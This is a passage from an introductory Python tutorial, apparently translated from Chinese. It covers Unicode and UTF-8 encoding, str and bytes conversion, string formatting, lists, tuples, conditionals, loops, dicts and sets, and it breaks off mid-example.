Unifying everything into Unicode makes the garbling problem disappear, but a new problem arises: if the text you write is almost entirely English, the Unicode encoding needs twice as much storage as ASCII, which is very uneconomical for storage and transmission.

Therefore, in the spirit of economy, the UTF-8 encoding emerged, which turns Unicode into a variable-length encoding. UTF-8 encodes a character as 1 to 4 bytes depending on its code point: common English letters take 1 byte, Chinese characters usually take 3 bytes, and only rare characters take 4 bytes. If the text you are transferring contains a large number of English characters, UTF-8 saves space.

Encoding	ASCII	Unicode	UTF-8
A	01000001	00000000 01000001	01000001
中	x	01001110 00101101	11100100 10111000 10101101

From the table above, you can also find that UTF-8 encoding has the added benefit that ASCII encoding can actually be seen as part of UTF-8 encoding, so a large amount of legacy software that only supports ASCII encoding can continue to work under UTF-8 encoding.
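
The byte counts can be verified with encode(). This is only a sketch: the labels in the dictionary and the choice of U+1F600 as an example of a character outside the 16-bit range are assumptions made for illustration.

```python
samples = {
    'A': 'A',                # ASCII letter
    'zhong': '\u4e2d',       # the character 中
    'emoji': '\U0001F600',   # a character outside the 16-bit range
}

# Number of bytes each character occupies once encoded as UTF-8.
utf8_lengths = {label: len(ch.encode('utf-8')) for label, ch in samples.items()}
print(utf8_lengths)   # {'A': 1, 'zhong': 3, 'emoji': 4}

# Pure ASCII text produces identical bytes under ASCII and UTF-8.
ascii_compatible = 'ABC'.encode('ascii') == 'ABC'.encode('utf-8')
print(ascii_compatible)   # True
```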

Having figured out the relationship between ASCII, Unicode and UTF-8, we can summarize how character encoding commonly works in computer systems today.

In the computer memory, Unicode encoding is used uniformly, and when it needs to be saved to the hard disk or needs to be transferred, it is converted to UTF-8 encoding.

When editing with Notepad, the UTF-8 characters read from a file are converted to Unicode characters in memory, and when you save, the Unicode is converted back to UTF-8 and written to the file.
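
The same round trip can be sketched in Python with open() and an explicit encoding argument. The temporary directory and the file name demo.txt are placeholders chosen for this example.

```python
import os
import tempfile

text = 'ABC \u4e2d\u6587'   # 'ABC 中文': 6 characters in memory
path = os.path.join(tempfile.mkdtemp(), 'demo.txt')

# Saving: the in-memory str is converted to UTF-8 bytes on disk.
with open(path, 'w', encoding='utf-8') as f:
    f.write(text)

# Reading in binary mode shows the raw bytes that were stored.
with open(path, 'rb') as f:
    raw = f.read()

# Reading in text mode converts the UTF-8 bytes back to a str.
with open(path, 'r', encoding='utf-8') as f:
    restored = f.read()

print(len(text), len(raw))   # 6 10
print(restored == text)      # True
```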

When browsing the web, the server converts the dynamically generated Unicode content to UTF-8 before transferring it to the browser.

So you see many web pages with something like <meta charset="UTF-8" /> in their source code, indicating that the page is encoded in UTF-8.

Python's strings

With the headache of character encoding out of the way, let's look at Python strings.

In Python 3, strings are Unicode, which means Python strings support multiple languages, for example:

>>> print('包含中文的str')
包含中文的str

For the encoding of individual characters, Python provides the ord() function to obtain an integer representation of the character, and the chr() function to convert the encoding to the corresponding character:

>>> ord('A')
65
>>> ord('中')
20013
>>> chr(66)
'B'
>>> chr(25991)
'文'

If you know the integer code of a character, you can also write a str using hexadecimal escapes like this:

>>> '\u4e2d\u6587'
'中文'

The two ways of writing are exactly equivalent.

Python's string type is str, which is represented in memory as Unicode, so one character may correspond to several bytes. To transfer a string over the network or save it to disk, you need to convert the str to bytes, a sequence of bytes.

Python represents data of type bytes with single or double quotes prefixed with b:

x = b'ABC'

Be careful to distinguish 'ABC' from b'ABC'. The former is a str; the latter is bytes, in which each character occupies exactly one byte, although the two are displayed almost identically.

The str in Unicode can be encoded to the specified bytes by the encode() method, e.g.

>>> 'ABC'.encode('ascii')
b'ABC'
>>> '中文'.encode('utf-8')
b'\xe4\xb8\xad\xe6\x96\x87'
>>> '中文'.encode('ascii')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)

A str of pure English can be encoded to bytes with ASCII, and the content stays the same; a str containing Chinese can be encoded to bytes with UTF-8. A str containing Chinese cannot be encoded with ASCII, because Chinese characters fall outside the ASCII range, so Python reports an error.

In bytes, bytes that cannot be displayed as ASCII characters are displayed with \x##.

Conversely, if we read a stream of bytes from the network or from a disk, the data read is bytes. To change bytes to str, the decode() method is used.

>>> b'ABC'.decode('ascii')
'ABC'
>>> b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
'中文'

If bytes contains bytes that cannot be decoded, the decode() method will report an error.

>>> b'\xe4\xb8\xad\xff'.decode('utf-8')
Traceback (most recent call last):
  ...
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 3: invalid start byte

If there are only a small number of invalid bytes in bytes, you can pass errors='ignore' to ignore the erroneous bytes.

>>> b'\xe4\xb8\xad\xff'.decode('utf-8', errors='ignore')
'中'
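
Besides errors='ignore', the decode() method also accepts errors='replace', which substitutes the Unicode replacement character U+FFFD for each undecodable byte instead of silently dropping it. A small sketch comparing the two, with illustrative variable names:

```python
data = b'\xe4\xb8\xad\xff'   # three valid UTF-8 bytes followed by one invalid byte

ignored = data.decode('utf-8', errors='ignore')     # invalid byte is dropped
replaced = data.decode('utf-8', errors='replace')   # invalid byte becomes U+FFFD

print(len(ignored), len(replaced))   # 1 2
print(replaced[-1] == '\ufffd')      # True
```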

To calculate how many characters str contains, you can use the len() function.

>>> len('ABC')
3
>>> len('中文')
2

The len() function counts the number of characters in a str; given bytes, len() counts the number of bytes.

>>> len(b'ABC')
3
>>> len(b'\xe4\xb8\xad\xe6\x96\x87')
6
>>> len('中文'.encode('utf-8'))
6

As you can see, 1 Chinese character will usually occupy 3 bytes after UTF-8 encoding, while 1 English character will occupy only 1 byte.

When manipulating strings, we often encounter the interconversion of str and bytes. To avoid garbling problems, you should always use UTF-8 encoding for str and bytes conversions.

Since Python source code is also a text file, when your source code contains Chinese, be sure to save it as UTF-8. So that the Python interpreter reads the source code as UTF-8, we usually write these two lines at the beginning of the file:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

The first comment line tells Linux/OS X that this is an executable Python program; Windows ignores this comment.

The second comment line tells the Python interpreter to read the source code as UTF-8; otherwise, the Chinese output you write in the source code may be garbled.

Declaring UTF-8 encoding does not mean that your .py file is actually UTF-8 encoded; you must also make sure that the text editor saves it as UTF-8 without BOM.

If the .py file itself uses UTF-8 encoding and also declares # -*- coding: utf-8 -*-, opening a command prompt to test will display Chinese properly.

Formatting

The last common problem is how to output a formatted string. We often output strings like 'Hello dear xxx! Your phone bill for month xx is xx and your balance is xx', where the xxx parts change according to variables, so an easy way to format strings is needed.

In Python, one formatting style is the same as in C and is implemented with the % operator, for example:

>>> 'Hello, %s' % 'world'
'Hello, world'
>>> 'Hi, %s, you have $%d.' % ('Michael', 1000000)
'Hi, Michael, you have $1000000.'

As you may have guessed, the % operator is used to format strings. Inside a string, %s means substitute a string and %d means substitute an integer. A string with several %? placeholders is followed by the same number of variables or values, in matching order. If there is only one %?, the parentheses can be omitted.

Common placeholders are:

Placeholders	Replacement Content
%d	Integer
%f	Float
%s	String
%x	Hex Integer

In addition, when formatting integers and floating-point numbers you can specify whether to pad with zeros and how many integer and fractional digits to show:

# -*- coding: utf-8 -*-
print('%2d-%02d' % (3, 1))
print('%.2f' % 3.1415926)
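
For reference, here is what these format specifications produce. The sketch stores the results in illustrative variables and adds one %x case from the placeholder table.

```python
padded = '%2d-%02d' % (3, 1)   # width 2 padded with a space, then width 2 padded with zeros
rounded = '%.2f' % 3.1415926   # two digits after the decimal point
hexed = '%x' % 255             # hexadecimal integer

print(repr(padded))   # ' 3-01'
print(rounded)        # 3.14
print(hexed)          # ff
```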

If you're not sure which placeholder to use, %s always works; it converts any data type to a string:

>>> 'Age: %s. Gender: %s' % (25, True)
'Age: 25. Gender: True'

Sometimes the % inside a string is an ordinary character. It then needs to be escaped: use %% to represent a single %.

>>> 'growth rate: %d %%' % 7
'growth rate: 7 %'

format()

Another way to format a string is to use the string's format() method, which replaces the placeholders {0}, {1}, ... within the string, in order, with the arguments passed in, although this is more cumbersome to write than %:

>>> 'Hello, {0}, your score improved by {1:.1f}%'.format('Xiao Ming', 17.125)
'Hello, Xiao Ming, your score improved by 17.1%'

f-string

The last way to format strings is to use a string prefixed with f, called an f-string. It differs from a normal string in that any {xxx} it contains is replaced with the value of the corresponding variable:

>>> r = 2.5
>>> s = 3.14 * r ** 2
>>> print(f'The area of a circle with radius {r} is {s:.2f}')
The area of a circle with radius 2.5 is 19.62

In the above code, {r} is replaced by the value of the variable r, {s:.2f} is replaced by the value of the variable s, and the .2f after : specifies the formatting parameter (i.e., two decimal places are retained), so the result of the replacement of {s:.2f} is 19.62.
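
A few more format specifications work the same way after the colon. The sketch below uses made-up values for name, balance, and rate; f-strings require Python 3.6 or later.

```python
name = 'Michael'
balance = 1000000
rate = 0.075

# ',' adds thousands separators; '.1%' multiplies by 100 and appends a percent sign.
line = f'Hi, {name}, you have ${balance:,} at {rate:.1%}.'
print(line)    # Hi, Michael, you have $1,000,000 at 7.5%.

# Expressions are allowed inside the braces, and '03d' pads with zeros to width 3.
agent = f'{3 + 4:03d}'
print(agent)   # 007
```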

Summary

Python 3's strings use Unicode, which directly supports multiple languages.

When str and bytes are converted to each other, the encoding needs to be specified. The most common encoding is UTF-8, and Python certainly supports other encodings, such as encoding Unicode to GB2312.

>>> '中文'.encode('gb2312')
b'\xd6\xd0\xce\xc4'

However, doing so is just asking for trouble. Unless you have a special business requirement, remember to use only UTF-8.

Formatting strings can be tested easily and quickly with Python's interactive environment.

Reference source code

the_string.py

Using lists and tuples

lists

One of Python's built-in data types is the list. A list is an ordered collection whose elements can be added and removed at any time.

For example, listing the names of all the students in a class can be represented by a list.

>>> classmates = ['Michael', 'Bob', 'Tracy']
>>> classmates
['Michael', 'Bob', 'Tracy']

The variable classmates is a list, and the number of elements in the list can be obtained using the len() function.

>>> len(classmates)
3

Use the index to access the element at each position in the list, remembering that the index starts at 0.

>>> classmates[0]
'Michael'
>>> classmates[1]
'Bob'
>>> classmates[2]
'Tracy'
>>> classmates[3]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
IndexError: list index out of range

Python will report an IndexError error when the index is out of range, so make sure the index doesn't go out of bounds, and remember that the index of the last element is len(classmates) - 1.

To fetch the last element, instead of calculating the index position you can use -1 as the index and get the last element directly:

>>> classmates[-1]
'Tracy'

In the same way, you can get the second-to-last and the third-to-last elements:

>>> classmates[-2]
'Bob'
>>> classmates[-3]
'Michael'
>>> classmates[-4]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
IndexError: list index out of range

Of course, the fourth-to-last element is out of bounds.

A list is a mutable ordered collection, so it is possible to append elements to the end of a list.

>>> classmates.append('Adam')
>>> classmates
['Michael', 'Bob', 'Tracy', 'Adam']

It is also possible to insert an element into a specified position, such as the position with index number 1.

>>> classmates.insert(1, 'Jack')
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy', 'Adam']

To delete the element at the end of a list, use the pop() method.

>>> classmates.pop()
'Adam'
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy']

To delete the element at the specified position, use the pop(i) method, where i is the index position.

>>> classmates.pop(1)
'Jack'
>>> classmates
['Michael', 'Bob', 'Tracy']

To replace an element with another element, you can directly assign it to the corresponding index position.

>>> classmates[1] = 'Sarah'
>>> classmates
['Michael', 'Sarah', 'Tracy']

The data types of the elements inside the list can also be different, e.g.

>>> L = ['Apple', 123, True]

A list element can also be another list, e.g.

>>> s = ['python', 'java', ['asp', 'php'], 'scheme']
>>> len(s)
4

Note that s has only 4 elements, where s[2] is again a list, which is easier to understand if you split it up.

>>> p = ['asp', 'php']
>>> s = ['python', 'java', p, 'scheme']

To get 'php' you can write p[1] or s[2][1], so s can be seen as a two-dimensional array. Three-dimensional, four-dimensional, and higher-dimensional arrays are built the same way, but they are rarely used.

If a list contains no elements at all, it is an empty list, which has length 0.
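
A short sketch of nested indexing follows. The grid variable is an invented example; the second half reuses p and s from above to show that s[2] and p are the same list object.

```python
# A 2 x 3 "two-dimensional array" built from nested lists.
grid = [
    [1, 2, 3],
    [4, 5, 6],
]
print(grid[1][2])                # 6: row 1, column 2
print(len(grid), len(grid[0]))   # 2 3

# s[2] is not a copy of p; both names refer to one list.
p = ['asp', 'php']
s = ['python', 'java', p, 'scheme']
p.append('jsp')
print(s[2])                      # ['asp', 'php', 'jsp']
```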

>>> L = []
>>> len(L)
0

tuple

Another kind of ordered collection is the tuple. A tuple is very similar to a list, but a tuple cannot be modified once it has been initialized. For example, the names of classmates can also be listed in a tuple:

>>> classmates = ('Michael', 'Bob', 'Tracy')

Now the tuple classmates cannot be changed, and it has no methods like append() or insert(). You can read elements with classmates[0] and classmates[-1] as usual, but you cannot assign a new value to any element.
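
What happens on an attempted assignment can be seen in the sketch below. The try/except form is used only so that the script keeps running; error_message is an illustrative name.

```python
classmates = ('Michael', 'Bob', 'Tracy')

try:
    classmates[0] = 'Adam'        # tuples reject item assignment
except TypeError as exc:
    error_message = str(exc)

print(error_message)                   # 'tuple' object does not support item assignment
print(hasattr(classmates, 'append'))   # False: there is no append() method
print(classmates[0], classmates[-1])   # Michael Tracy
```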

What is the point of immutable tuples? Because tuples are immutable, the code is safer. If possible, try to use a tuple instead of a list.

The tuple trap: When you define a tuple, the elements of the tuple must be identified at the time of definition, e.g.

>>> t = (1, 2)
>>> t
(1, 2)

To define an empty tuple, you can write () as follows:

>>> t = ()
>>> t
()

However, suppose you try to define a tuple with only 1 element like this:

>>> t = (1)
>>> t
1

It's not the tuple that is defined, it's the number 1! This is because the parentheses () can represent both tuple and parentheses in a mathematical formula, which creates ambiguity, so Python specifies that in this case, the calculation is done by parentheses, and the result is naturally 1.

Therefore, tuples with only 1 element must be defined with a comma , to disambiguate.

>>> t = (1,)
>>> t
(1,)

Python also adds a comma , when displaying tuples with only 1 element, so that you don't misinterpret them as parentheses in the mathematical sense.

Finally, look at a "mutable" tuple.

>>> t = ('a', 'b', ['A', 'B'])
>>> t[2][0] = 'X'
>>> t[2][1] = 'Y'
>>> t
('a', 'b', ['X', 'Y'])

This tuple is defined with 3 elements, 'a', 'b' and a list. How come it changed later?

Don't worry. Let's first look at the tuple as it was defined, containing three elements: 'a', 'b' and a list.

When we change the list's elements 'A' and 'B' to 'X' and 'Y', the tuple becomes:

On the surface, the elements of the tuple do change, but in fact it is not the tuple's elements that change; it is the elements of the list. The list that the tuple pointed to at the start has not been swapped for another list. The so-called immutability of a tuple means that each element of the tuple always points to the same object: if an element points to 'a', it cannot be changed to point to 'b', and if it points to a list, it cannot be changed to point to another object, but the list itself is mutable!

Now that "pointing to the same object" is understood, how do you create a tuple whose contents also never change? You must ensure that every element of the tuple is itself immutable.
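
One way to do that, sketched here as an illustration rather than the only option, is to nest a tuple instead of a list. The names frozen and changed are chosen for this example.

```python
frozen = ('a', 'b', ('A', 'B'))   # nested tuple instead of a nested list

try:
    frozen[2][0] = 'X'            # the inner tuple rejects assignment too
except TypeError:
    changed = False
else:
    changed = True

print(changed)   # False
print(frozen)    # ('a', 'b', ('A', 'B'))
```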

Summary

Lists and tuples are Python's built-in ordered collections, one mutable and one immutable. Choose between them as needed.

Reference source code

the_list.py

the_tuple.py

Conditional Judgment

The computer can do many automated tasks because it can make its own conditional judgments.

For example, entering the user's age and printing different things depending on the age is implemented in a Python program with the if statement.

age = 20
if age >= 18:
    print('your age is', age)
    print('adult')

According to Python's indentation rules, if the condition of the if statement evaluates to True, the two indented print statements are executed; otherwise nothing is done.

You can also add an else clause to if: when the if condition evaluates to False, the if block is skipped and the else block is executed instead.

age = 3
if age >= 18:
    print('your age is', age)
    print('adult')
else:
    print('your age is', age)
    print('teenager')

Be careful not to omit the colon :.

Of course, the judgment above is very rough. A finer-grained judgment is possible with elif:

age = 3
if age >= 18:
    print('adult')
elif age >= 6:
    print('teenager')
else:
    print('kid')

elif is short for else if, and it is perfectly possible to have more than one elif, so the full form of the if statement is:

if <condition 1>:
    <statements 1>
elif <condition 2>:
    <statements 2>
elif <condition 3>:
    <statements 3>
else:
    <statements 4>

The if statement is evaluated from top to bottom. As soon as one condition evaluates to True, the statements for that condition are executed and the remaining elif and else branches are ignored. So, please test and explain why the following program prints teenager.

age = 20
if age >= 6:
    print('teenager')
elif age >= 18:
    print('adult')
else:
    print('kid')

The if condition can also be abbreviated, for example:

if x:
    print('True')

As long as x is a non-zero value, a non-empty string, a non-empty list, etc., it is judged to be True, otherwise it is False.
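
The rule can be checked with the built-in bool(), which applies the same truth test that if uses. The list of sample values below is an illustrative selection.

```python
values = [0, 1, -1, '', 'abc', [], [0], None]

# bool(v) gives the result an if statement would see for v.
truthy = [bool(v) for v in values]
print(truthy)   # [False, True, True, False, True, False, True, False]
```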

Reconsider input

Finally, let's look at a problematic conditional judgment. Many students use input() to read the user's input, so that they can type values themselves and the program is more interesting to run:

birth = input('birth: ')
if birth < 2000:
    print('born before 2000')
else:
    print('born in 2000 or later')

Entering 1982 resulted in the following error.

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: '<' not supported between instances of 'str' and 'int'

This is because the data type returned by input() is str, which cannot be compared directly with an integer and must first be converted from str to an integer. Python provides the int() function to do this.

s = input('birth: ')
birth = int(s)
if birth < 2000:
    print('born before 2000')
else:
    print('born in 2000 or later')

Run it again and you will get the correct result. But what if you type abc? Again, you will get an error message.

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: invalid literal for int() with base 10: 'abc'

It turns out that the int() function reports an error when it finds a string that is not a legal number, and the program exits.

How do you check for and catch program runtime errors? We'll talk about errors and debugging later.
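
As a brief preview, one common pattern is to wrap the conversion in try/except. The helper name parse_birth_year and its choice to return None on bad input are assumptions made for this sketch, not part of the original program.

```python
def parse_birth_year(text):
    """Hypothetical helper: return the year as an int, or None if text is not a number."""
    try:
        return int(text)      # int() tolerates surrounding whitespace
    except ValueError:
        return None           # the input was not a valid integer

for raw in ('1982', ' 2005 ', 'abc'):
    print(repr(raw), parse_birth_year(raw))
# '1982' 1982
# ' 2005 ' 2005
# 'abc' None
```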

Summary

Conditional judgments allow the computer to make its own choices. Python's if...elif...else is very flexible.

Conditions are matched from the top down. The block for the first condition that is met is executed, and the subsequent elif and else branches are skipped.

Reference source code

do_if.py

Loop

To calculate 1+2+3, we can simply write the expression.

>>> 1 + 2 + 3
6

To calculate 1+2+3+...+10, you can still just about write it out.

However, to calculate 1+2+3+... +10,000, it's impossible to write the expression directly.

In order for the computer to compute thousands of iterations, we need loop statements.

Python has two kinds of loops. The first is the for...in loop, which iterates through each element of a list or tuple in turn, as in this example:

names = ['Michael', 'Bob', 'Tracy']
for name in names:
    print(name)

Executing this code will print each element of names in turn.

Michael
Bob
Tracy

So the for x in ... loop assigns each element in turn to the variable x and then executes the indented block.

Another example is if we want to calculate the sum of integers from 1 to 10, we can use a sum variable to do the accumulation.

sum = 0
for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
    sum = sum + x
print(sum)

If you want to calculate the sum of integers from 1 to 100, writing out every number from 1 to 100 is tedious. Fortunately, Python provides a range() function that generates a sequence of integers, which can be converted to a list with the list() function. For example, range(5) generates the integers from 0 up to, but not including, 5.

>>> list(range(5))
[0, 1, 2, 3, 4]

range(101) generates the sequence of integers from 0 to 100, so the sum is calculated as follows.

# -*- coding: utf-8 -*-
sum = 0
for x in range(101):
    sum = sum + x
print(sum)

Please run the above code yourself to see whether the result is the 5050 that the young Gauss famously worked out in his head.
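
For comparison, the sketch below computes the same total three ways: with the loop, with the built-in sum(), and with the closed-form formula n(n+1)/2. The variable names are illustrative.

```python
n = 100

# Explicit loop, as in the text.
loop_total = 0
for x in range(n + 1):
    loop_total = loop_total + x

# The built-in sum() accepts any sequence of numbers, including a range.
builtin_total = sum(range(n + 1))

# Closed-form formula for 1 + 2 + ... + n.
formula_total = n * (n + 1) // 2

print(loop_total, builtin_total, formula_total)   # 5050 5050 5050
```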

The second type of loop is the while loop, which keeps looping as long as the conditions are met, and exits the loop when the conditions are not met. For example, if we want to calculate the sum of all odd numbers within 100, we can use a while loop to do the following.

sum = 0
n = 99
while n > 0:
    sum = sum + n
    n = n - 2
print(sum)

Inside the loop, the variable n keeps decreasing itself until it becomes -1, when the while condition is no longer met and the loop exits.
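
The final value of n and the total can be confirmed as follows. The second computation uses range() with a step of 2, which is an alternative shown only for comparison.

```python
while_total = 0
n = 99
while n > 0:
    while_total = while_total + n
    n = n - 2

# range(1, 100, 2) yields 1, 3, 5, ..., 99.
range_total = sum(range(1, 100, 2))

print(while_total, range_total)   # 2500 2500
print(n)                          # -1: the value that made the condition fail
```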

break

In a loop, the break statement exits the loop early. For example, here is a loop that prints the numbers 1 to 100.

n = 1
while n <= 100:
    print(n)
    n = n + 1
print('END')

The code above prints out 1 to 100.

To end the loop early, you can use the break statement.

n = 1
while n <= 100:
    if n > 10: # When n = 11, the condition is met and the break statement is executed
        break # The break statement will end the current loop
    print(n)
    n = n + 1
print('END')

As you can see from the above code, after 1 to 10 are printed, END is printed immediately afterwards and the program ends.

It can be seen that the function of break is to end the loop early.

continue

During the loop, you can also skip the current loop and start the next one directly with the continue statement.

n = 0
while n < 10:
    n = n + 1
    print(n)

The above program prints 1 to 10. However, if we want to print only odd numbers, we can skip certain loops with the continue statement.

n = 0
while n < 10:
    n = n + 1
    if n % 2 == 0: # If n is an even number, execute the continue statement
        continue # The continue statement will continue directly to the next loop, and the subsequent print() statement will not be executed
    print(n)

Executing the above code, you can see that it no longer prints 1 to 10, but 1, 3, 5, 7, and 9.

You can see that the purpose of continue is to end the current loop early and start the next one directly.

Summary

Loops are an effective way to get the computer to do repetitive tasks.

The break statement can exit the loop directly during the loop, while the continue statement can end the current round of loops early and start the next round directly. Both of these statements usually must be used in conjunction with the if statement.

Be especially careful not to abuse the break and continue statements. break and continue can cause the code execution logic to bifurcate too much and be prone to errors. Most loops do not require the use of break and continue statements, and both of the above examples can be done by rewriting the loop condition or modifying the loop logic to remove the break and continue statements.
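
One possible rewrite of the two examples without break or continue is sketched below. The results are collected into the illustrative lists first_ten and odds instead of being printed one by one, so they are easy to inspect.

```python
# Instead of break: put the limit into the loop condition.
first_ten = []
n = 1
while n <= 10:
    first_ten.append(n)
    n = n + 1

# Instead of continue: invert the test and act only on odd numbers.
odds = []
n = 0
while n < 10:
    n = n + 1
    if n % 2 == 1:
        odds.append(n)

print(first_ten)   # [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(odds)        # [1, 3, 5, 7, 9]
```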

In some cases, if the code is written incorrectly, the program falls into an infinite loop, that is, a loop that goes on forever. In this case, you can press Ctrl+C to exit the program or force the Python process to end.

Please try to write a program with an infinite loop.

Reference source code

do_for.py

do_while.py

Using dict and set

dict

Python has built-in support for dictionaries through dict, known as a map in some other languages. A dict stores key-value pairs and offers extremely fast lookup.

For example, suppose you want to look up grades by classmates' names. Implemented with lists, this needs two lists.

names = ['Michael', 'Bob', 'Tracy']
scores = [95, 75, 85]

Given a name, to find the corresponding score you must first find its position in names and then take the score at that position from scores. The longer the list, the longer this takes.

With a dict, we need only one name-to-score lookup table, and we can find a score directly from a name; no matter how big the table is, the lookup does not slow down. Write a dict in Python as follows.

>>> d = {'Michael': 95, 'Bob': 75, 'Tracy': 85}
>>> d['Michael']
95
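
The two approaches can be put side by side. In this sketch, list.index() performs the linear scan described above, and dict(zip(...)) is one convenient way to build the dict from the two lists; the variable names are illustrative.

```python
names = ['Michael', 'Bob', 'Tracy']
scores = [95, 75, 85]

# Two-list approach: scan names for the position, then index into scores.
bob_from_lists = scores[names.index('Bob')]

# dict approach: pair each name with its score, then look up by key.
d = dict(zip(names, scores))
bob_from_dict = d['Bob']

print(d)                               # {'Michael': 95, 'Bob': 75, 'Tracy': 85}
print(bob_from_lists, bob_from_dict)   # 75 75
```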

Why is dict lookup so fast? Because a dict works on the same principle as looking up a word in a paper dictionary. Suppose the dictionary contains 10,000 Chinese characters and we want to look up one of them. One way is to page through the dictionary from the first page until we find the character we want. This is how elements are found in a list: the larger the list, the slower the search.

The second way is to look up the page number for the character in the dictionary's index (for example, the radical index), then turn directly to that page and find the character. No matter which character you are looking for, this search is very fast and does not slow down as the dictionary grows.

Given a name, such as 'Michael', dict can internally calculate the "page number" of Michael, which is the memory address where the number 95 is stored, and take it out directly, so it is very fast.

As you can guess, with this key-value storage the location of a value must be calculated from its key when the value is stored, so that the value can later be retrieved directly by key.

Besides specifying data at initialization, you can also put data into a dict by key.

>>> d['Adam'] = 67
>>> d['Adam']
67

Since a key can correspond to only one value, assigning to the same key several times overwrites the previous value.

>>> d['Jack'] = 90
>>> d['Jack']
90
>>> d['Jack'] = 88
>>> d['Jack']
88

If the key does not exist, dict will report an error.

>>> d['Thomas']
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
KeyError: 'Thomas'

There are two ways to avoid the error raised by a missing key. One is to check whether the key exists with in.

>>> 'Thomas' in d
False

The second is the get() method provided by dict, which returns None if the key does not exist, or a default value that you specify.

>>> d.get('Thomas')
>>> d.get('Thomas', -1)
-1

Note: Python's interactive environment does not show the result when None is returned.

To delete a key, use the pop(key) method, and the corresponding value will also be deleted from the dict.

>>> d.pop('Bob')
75
>>> d
{'Michael': 95, 'Tracy': 85}

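Note that you should not rely on the internal storage order of a dict when looking up values. Since Python 3.7, iterating over a dict yields the keys in insertion order; in earlier versions the order was arbitrary.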

Compared with list, dict has the following features.

Lookup and insertion are extremely fast and do not slow down as the number of keys grows.
It takes up a lot of memory, so more memory is wasted.

In contrast, list has the following features.

Lookup and insertion time grows with the number of elements.
It takes up little space and wastes little memory.

So, dict is a way to trade space for time.

dict can be used wherever high-speed lookup is needed, and it is almost ubiquitous in Python code. Using dict correctly is very important, and the first thing to keep in mind is that the key of a dict must be an immutable object.

This is because dict calculates the storage location of the value from the key. If calculating the same key gave a different result each time, the contents of the dict would be completely scrambled. The algorithm that calculates the location from the key is called a hash algorithm.

To ensure the correctness of the hash, the object that is the key cannot change. In Python, strings, integers, etc. are immutable and can therefore be safely used as keys, whereas lists are mutable and cannot be used as keys.

>>> key = [1, 2, 3]
>>> d[key] = 'a list'
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: unhashable type: 'list'

set

A set is similar to a dict in that it is also a collection of keys, but it does not store values. Since keys cannot be duplicated, there are no duplicate keys in a set.

To create a set, provide a list as the input collection.

>>> s = set([1, 2, 3])
>>> s
{1, 2, 3}

Note that the passed parameter [1, 2, 3] is a list, and the displayed {1, 2, 3} just tells you that there are 3 elements inside this set, 1, 2, 3, and the displayed order does not indicate that the set is ordered.

Duplicate elements are automatically filtered in the set.

>>> s = set([1, 1, 2, 2, 3, 3])
>>> s
{1, 2, 3}

Elements can be added to the set with the add(key) method. Adding the same element repeatedly is allowed but has no effect.

>>> s.add(4)
>>> s
{1, 2, 3, 4}
>>> s.add(4)
>>> s
{1, 2, 3, 4}

Elements can be removed by the remove(key) method.

>>> s.remove(4)
>>> s
{1, 2, 3}

A set can be seen as an unordered collection of non-repeating elements in the mathematical sense, so two sets can be combined with mathematical operations such as intersection and union.

>>> s1 = set([1, 2, 3])
>>> s2 = set([2, 3, 4])
>>> s1 & s2
{2, 3}
>>> s1 | s2
{1, 2, 3, 4}

The only difference between set and dict is that set stores no corresponding values. The principle behind set is the same as dict, so mutable objects cannot be put into it either: a mutable object has no stable hash, so the set could not reliably tell whether two elements are equal and could not guarantee that it contains no duplicate elements. Try putting a list into a set and see if you get an error.
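A minimal sketch of that experiment follows. The exact wording of the error message varies between Python versions, so the code only captures it rather than assuming a specific text.

```python
s = {1, 2, 3}

message = None
try:
    s.add([4, 5])            # a list is mutable, so it cannot be hashed
except TypeError as e:
    message = str(e)

print(message)               # wording depends on the Python version

s.add((4, 5))                # a tuple of integers is immutable and works
print((4, 5) in s)           # True
```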

Immutable objects revisited

As we said above, str is an immutable object, while list is a mutable object.

For mutable objects such as list, operating on the list changes its contents. For example:

>>> a = ['c', 'b', 'a']
>>> a.sort()
>>> a
['a', 'b', 'c']

And what about operations on immutable objects such as str?

>>> a = 'abc'
>>> a.replace('a', 'A')
'Abc'
>>> a
'abc'

Although the string has a replace() method, and it does turn out to be 'Abc', the variable a still ends up being 'abc', so how should we understand it?

Let's change the code to the following.

>>> a = 'abc'
>>> b = a.replace('a', 'A')
>>> b
'Abc'
>>> a
'abc'

The thing to always keep in mind is that a is the variable, and 'abc' is the string object! There are times when we often say that the content of the object a is 'abc', but what we really mean is that a itself is a variable, and it is the content of the object it points to that is 'abc'.

┌───┐                  ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘                  └───────┘

When we call a.replace('a', 'A'), the call to method replace actually acts on the string object 'abc', and the method, despite its name replace, does not change the content of the string 'abc'. Instead, the replace method creates a new string 'Abc' and returns it, and if we use the variable b to point to that new string, it is easy to understand that the variable a still points to the original string 'abc', but the variable b points to the new string 'Abc'.

┌───┐                  ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘                  └───────┘
┌───┐                  ┌───────┐
│ b │─────────────────>│ 'Abc' │
└───┘                  └───────┘

So, for immutable objects, calling any method on the object itself will not change the content of the object itself. Instead, these methods create new objects and return them, thus ensuring that the immutable object itself is always immutable.
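The contrast between the two kinds of objects can be seen side by side in a short sketch (the variable names here are only illustrative): a str method hands back a new object, while list.sort() changes the list in place and returns None.

```python
text = 'abc'
upper = text.upper()       # creates and returns a new string
print(text, upper)         # abc ABC

items = ['c', 'b', 'a']
result = items.sort()      # sorts the same list object in place
print(items, result)       # ['a', 'b', 'c'] None
```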

Summary

Using a key-value storage structure for dict is very useful in Python. It is important to choose immutable objects as keys, and the most common key is a string.

While tuple is an immutable object, try putting (1, 2, 3) and (1, [2, 3]) into a dict or set and interpret the results.
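One way to run this experiment is sketched below. The tuple itself is immutable, but a tuple is only usable as a key when everything inside it is hashable too, so the second assignment is expected to fail.

```python
d = {}
d[(1, 2, 3)] = 'ok'              # every element is immutable: works

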